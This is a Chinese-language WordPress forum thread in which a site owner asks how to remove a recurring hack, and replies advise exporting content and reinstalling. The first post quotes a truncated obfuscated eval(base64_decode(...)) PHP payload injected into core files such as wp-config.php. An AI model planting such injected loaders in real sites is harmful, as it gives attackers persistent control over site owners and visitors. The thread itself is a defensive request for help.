网站被黑，无法清除，求助 | WordPress.org China 简体中文

rinkeliu
(@rinkeliu)

7年、 3月前

访问网站时，会看到有到v-kad.com的数据链接,index.php，或者wp-config.php,wp-setting,wp-setting.php会被修改添加eval(base64_decode(“aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJHRjc2hqd3hjID0gMjE1OyBmdW5jdGlvbiBhand3dHBwZmcoJHhpZm9pc2EsICRkaHVzZHNsYil7JHVjbWRqYXNlbiA9ICcnOyBmb3IoJGk9MDsgJGkgPCBzdHJsZW4oJHhpZm9pc2EpOyAkaSsrKXskdWNtZGphc2VuIC49IGlzc2V0KCRkaHVzZHNs…..);
这样加密后的PHP代码，还会建立子目录。
我把文件中所有这种代码清理掉，目录删除，过一阵子又会出来文件被修改，目录又被建立。
FTP密码，数据库密码都已经修改过了，文件照样被修改，加入代码，目录还是会被创建。

大家有没有见过这样的手法，能否协助我清除此黑客行为。

查看 6 回复 - 1 至 6 (总计 6)

版主 Dallas Lu
(@dallaslu)

7年、 3月前

重新另建运行环境吧，把 WordPress 的内容通过 xml 格式导出后还原到新的 WordPress 里。

帖子发表于 rinkeliu
(@rinkeliu)

7年、 3月前

那内容中的图片呢？图片文件很多。我是很想了解，这种黑入手法的机制。
诗语
(@f2010525)

7年、 3月前
是通过 php 代码自动生成的木马文件，这个你删不干净，也删不完。

我们以前遇到的情况记录贴：

http://bbs.weixiaoduo.com/topic/17556

图片打包备份下载，导出网站文章数据.xml 文件，同时搜索下文章中的内容，如 .net .com 此类域名，有异常内容一律删除。

重装，恢复数据，其他没啥。

参考资料：

http://doc.weixiaoduo.com/wordpress/16792.html

http://doc.weixiaoduo.com/wordpress/3492.html
- 该回复由诗语于 7年、 3月前修正。
帖子发表于 rinkeliu
(@rinkeliu)

7年、 3月前

非常感谢！！

帖子发表于 rinkeliu
(@rinkeliu)

7年、 3月前

内容通过 xml 格式导出后还原到新的 WordPress ，原来那些上传的图片文件怎么办，就是把upload目录还copy回去就可以了？

版主 Dallas Lu
(@dallaslu)

7年、 2月前

这样是可以的。

查看 6 回复 - 1 至 6 (总计 6)

话题 ‘网站被黑，无法清除，求助’不再接受新回复。

标签

黑客

发表在: 经验交流
6个回复
3人参与
最后的回复:Dallas Lu
最后动态：7年、 2月前
状态：尚未解决

话题

最热话题

没有回复的话题

非支持话题

已解决的话题

未解决的话题

所有话题